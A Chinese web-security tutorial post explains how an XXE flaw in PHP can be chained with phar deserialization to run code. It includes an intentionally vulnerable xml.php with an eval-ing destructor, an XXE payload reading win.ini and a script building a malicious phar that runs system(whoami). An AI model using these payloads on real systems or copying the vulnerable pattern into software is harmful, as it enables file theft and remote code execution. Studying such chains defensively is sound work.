【Web安全】从xxe到phar反序列化

409 阅读1分钟

重要:在 PHP 里面解析 xml 用的是 libxml,当 libxml 的版本大于 2.9.0 的时候默认是禁止解析 xml 外部实体内容的。

以下代码存在 xxe 漏洞。
xml.php:

 <?php
class Test { 
    public $cmd ; 
    public function __destruct () 
     { 
        eval ( $this-> cmd ); 
     } 
 } 
$xmlfile =  @ file_get_contents ( "php://input" ); 
$result =  @ simplexml_load_string ( $xmlfile ); 
echo $result ; 

 // 另一种解析 xml 的方式
 // class Test{ 
 //     public $cmd; 
 //     public function __destruct() 
 //     { 
 //         eval($this->cmd); 
 //     } 
 // } 

 // $file = file_get_contents("php://input"); 
 // $dom = new DOMDocument(); 
 // $dom->loadXML($file); 
 // $result = simplexml_import_dom($dom); 
 // echo $result; 

触发 xxe 漏洞实现任意文件读取。

 <?xml version="1.0"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini" > ]>
<foo> &xxe; </foo> 

在 xml 中有一个 Test 类,如果能反序列化该类的话就可以构造恶意代码执行。
支持解析 xml 外部实体的协议如下,可以看到 PHP 支持 phar 协议。也就是说只要有一个文件上传点,并且文件上传的路径是有回显的,那么就可以配合 xxe 漏洞去触发反序列化漏洞。

 

通过 xee 触发反序列化漏洞进行任意代码执行。
第一步:先构造 Test 类的 phar 文件,假设生成的 phar 文件已经被上传到 xml.php 的同一个目录。

 <?php
class Test { 
    public function __construct (){ 
        $this-> cmd = 'system(whoami);' ; 
     } 
 } 

 @ unlink ( "phar.phar" ); 
$phar = new Phar ( "phar.phar" );   //后缀名必须为phar
$phar-> startBuffering (); 
$phar-> setStub ( "<?php __HALT_COMPILER(); ?>" );   //设置stub
$o = new Test (); 
$phar-> setMetadata ( $o );   //将自定义的meta-data存入manifest
$phar-> addFromString ( "test.txt" ,  "test" );   //添加要压缩的文件
 //签名自动计算
$phar-> stopBuffering (); 
 ?> 

第二步:利用 xxe 漏洞使用 phar 协议解析 phar 文件成功执行命令。

最后

关注私我获取【网络安全学习资料·攻略